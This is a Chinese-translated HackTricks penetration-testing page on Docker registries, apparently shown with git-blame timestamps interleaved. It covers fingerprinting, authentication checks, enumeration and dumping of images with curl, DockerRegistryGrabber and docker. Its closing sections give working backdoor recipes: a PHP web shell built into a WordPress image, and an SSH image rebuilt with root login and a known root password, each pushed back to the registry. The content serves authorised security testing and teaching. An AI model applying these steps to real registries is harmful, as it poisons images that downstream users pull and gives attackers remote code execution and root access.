hacktricks/network-services-pentesting/5000-pentesting-docker-registry.md

287 lines
14 KiB
Markdown
Raw Normal View History

2023-08-03 19:12:22 +00:00
# 5000 - Docker注册表渗透测试
2022-04-28 16:01:33 +00:00
<details>
2023-08-03 19:12:22 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧。**
2022-04-28 16:01:33 +00:00
</details>
2023-08-03 19:12:22 +00:00
## 基本信息
2023-08-03 19:12:22 +00:00
**来自**[**这里**](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/#:\~:text=A%20Docker%20registry%20is%20a,versions%20of%20a%20specific%20image.)**。**
2023-08-03 19:12:22 +00:00
**Docker注册表**是一个用于存储和分发命名的Docker镜像的系统。同一个镜像可能有多个不同的版本通过它们的标签进行标识。\
Docker注册表被组织成**Docker仓库**一个仓库包含了特定镜像的所有版本。注册表允许Docker用户从本地拉取镜像以及在适当的访问权限下将新镜像推送到注册表中。
2023-08-03 19:12:22 +00:00
默认情况下Docker引擎与**DockerHub**交互DockerHub是Docker的公共注册表实例。然而也可以在本地运行开源的Docker注册表/分发系统,以及一个商业支持的版本称为**Docker Trusted Registry**。还有其他在线公共注册表可用。
2023-08-03 19:12:22 +00:00
要从本地注册表中拉取镜像,可以运行类似以下命令:
```
docker pull my-registry:9000/foo/bar:2.1
```
2023-08-03 19:12:22 +00:00
如果您从位于`my-registry`域,端口`9000`的本地注册表中拉取带有标签`2.1`的`foo/bar`镜像的版本,您可以运行以下命令在本地拉取相同的镜像:
2023-08-03 19:12:22 +00:00
```bash
docker pull my-registry:9000/foo/bar:2.1
```
2023-08-03 19:12:22 +00:00
如果您使用DockerHub并且`2.1`也是最新版本,您可以运行以下命令在本地拉取相同的镜像:
```
docker pull foo/bar
```
2023-08-03 19:12:22 +00:00
**默认端口:** 5000
```
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
```
2023-08-03 19:12:22 +00:00
## 发现
2023-08-03 19:12:22 +00:00
发现该服务运行的最简单方法是在nmap的输出中找到它。无论如何请注意由于它是一个基于HTTP的服务它可能在HTTP代理后面nmap无法检测到它。
一些指纹:
2023-08-03 19:12:22 +00:00
* 如果访问`/`,响应中没有返回任何内容
* 如果访问`/v2/`,则返回`{}`
* 如果访问`/v2/_catalog`,您可能会得到:
* `{"repositories":["alpine","ubuntu"]}`
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
2023-08-03 19:12:22 +00:00
## 枚举
2022-05-01 13:25:53 +00:00
### HTTP/HTTPS
2023-08-03 19:12:22 +00:00
Docker注册表可以配置为使用**HTTP**或**HTTPS**。所以你可能需要做的第一件事是**找出正在配置的是哪一个**
```bash
curl -s http://10.10.10.10:5000/v2/_catalog
#If HTTPS
2023-08-03 19:12:22 +00:00
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
#If HTTP
{"repositories":["alpine","ubuntu"]}
```
2023-08-03 19:12:22 +00:00
### 身份验证
2023-08-03 19:12:22 +00:00
Docker注册表也可以配置为需要**身份验证**
```bash
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required
{"repositories":["alpine","ubuntu"]}
```
2023-08-03 19:12:22 +00:00
如果Docker Registry需要身份验证您可以[**尝试使用此方法进行暴力破解**](../generic-methodologies-and-resources/brute-force.md#docker-registry)。\
**如果找到有效的凭据,您需要使用它们**来枚举注册表,在`curl`中可以像这样使用它们:
```bash
curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
```
2023-08-03 19:12:22 +00:00
### 使用DockerRegistryGrabber进行枚举
2023-08-03 19:12:22 +00:00
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber)是一个用于枚举/转储Docker注册表无身份验证或基本身份验证的Python工具。
```bash
python3 DockerGraber.py http://127.0.0.1 --list
[+] my-ubuntu
[+] my-ubuntu2
python3 DockerGraber.py http://127.0.0.1 --dump_all
[+] my-ubuntu
[+] my-ubuntu2
[+] blobSum found 5
[+] Dumping my-ubuntu
2023-08-03 19:12:22 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
[+] blobSum found 5
[+] Dumping my-ubuntu2
2023-08-03 19:12:22 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu
[+] blobSum found 5
[+] Dumping my-ubuntu
2023-08-03 19:12:22 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
```
2023-08-03 19:12:22 +00:00
### 使用curl进行枚举
2023-08-03 19:12:22 +00:00
一旦您**获得了对Docker注册表的访问权限**,以下是您可以使用的一些命令来进行枚举:
```bash
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
{"repositories":["alpine","ubuntu"]}
#Get tags of a repository
curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}
#Get manifests
curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest
{
2023-08-03 19:12:22 +00:00
"schemaVersion": 1,
"name": "ubuntu",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10"
}
],
"history": [
{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
},
{
"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}"
}
],
"signatures": [
{
"header": {
"jwk": {
"crv": "P-256",
"kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX",
"kty": "EC",
"x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg",
"y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg"
},
"alg": "ES256"
},
"signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q",
"protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ"
}
]
}
#Download one of the previously listed blobs
curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar
2023-08-03 19:12:22 +00:00
#检查每个blob的内部
tar -xf blob1.tar #执行此命令后,检查当前目录中创建的新文件夹和文件
{% hint style="warning" %}
2023-08-03 19:12:22 +00:00
请注意当您下载并解压缩blob文件和文件夹时它们将出现在当前目录中。**如果您将所有blob文件下载并解压缩到同一个文件夹中它们将覆盖先前解压缩的blob文件的值**所以请小心。最好将每个blob文件解压缩到不同的文件夹中以检查每个blob文件的确切内容。
{% endhint %}
2023-08-03 19:12:22 +00:00
### 使用docker进行枚举
```bash
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu
#Check the commands used to create the layers of the image
docker history 10.10.10.10:5000/ubuntu
#IMAGE CREATED CREATED BY SIZE COMMENT
2023-08-03 19:12:22 +00:00
#ed05bef01522 2 years ago ./run.sh 46.8MB
#<missing> 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B
#<missing> 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B
#<missing> 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B
#<missing> 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB
#Run and get a shell
docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
```
2023-08-03 19:12:22 +00:00
### 在WordPress镜像中植入后门
2023-08-03 19:12:22 +00:00
在你发现一个保存WordPress镜像的Docker Registry的情况下你可以植入后门。\
**创建**后门:
{% code title="shell.php" %}
```bash
<?php echo shell_exec($_GET["cmd"]); ?>
```
2023-08-03 19:12:22 +00:00
创建一个 **Dockerfile**
{% code title="Dockerfile" %}
```bash
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
```
{% endcode %}
2023-08-03 19:12:22 +00:00
**创建**新的镜像,**检查**它是否已创建,并**推送**它:
```bash
docker build -t 10.10.10.10:5000/wordpress .
2023-08-03 19:12:22 +00:00
#Create
docker images
docker push registry:5000/wordpress #Push it
```
2023-08-03 19:12:22 +00:00
### 在SSH服务器镜像中植入后门
2023-08-03 19:12:22 +00:00
假设你发现了一个带有SSH镜像的Docker Registry并且你想要在其中植入后门。\
**下载**该镜像并**运行**它:
```bash
docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli
```
2023-08-03 19:12:22 +00:00
从SSH镜像中提取`sshd_config`文件:
```bash
docker cp 4c989242c714:/etc/ssh/sshd_config .
```
2023-08-03 19:12:22 +00:00
并修改为:`PermitRootLogin yes`
2023-08-03 19:12:22 +00:00
创建一个名为**Dockerfile**的文件,内容如下:
{% tabs %}
{% tab title="Dockerfile" %}
```bash
FROM 10.10.10.10:5000/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd
```
{% endtab %}
{% endtabs %}
2023-08-03 19:12:22 +00:00
**创建**新的镜像,**检查**它是否已创建,并**推送**它:
```bash
docker build -t 10.10.10.10:5000/sshd-docker-cli .
2023-08-03 19:12:22 +00:00
#Create
docker images
docker push registry:5000/sshd-docker-cli #Push it
```
2022-04-28 16:01:33 +00:00
<details>
2023-08-03 19:12:22 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者你想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **通过向 [hacktricks 仓库](https://github.com/carlospolop/hacktricks) 和 [hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud) 提交 PR 来分享你的黑客技巧**。
2022-04-28 16:01:33 +00:00
</details>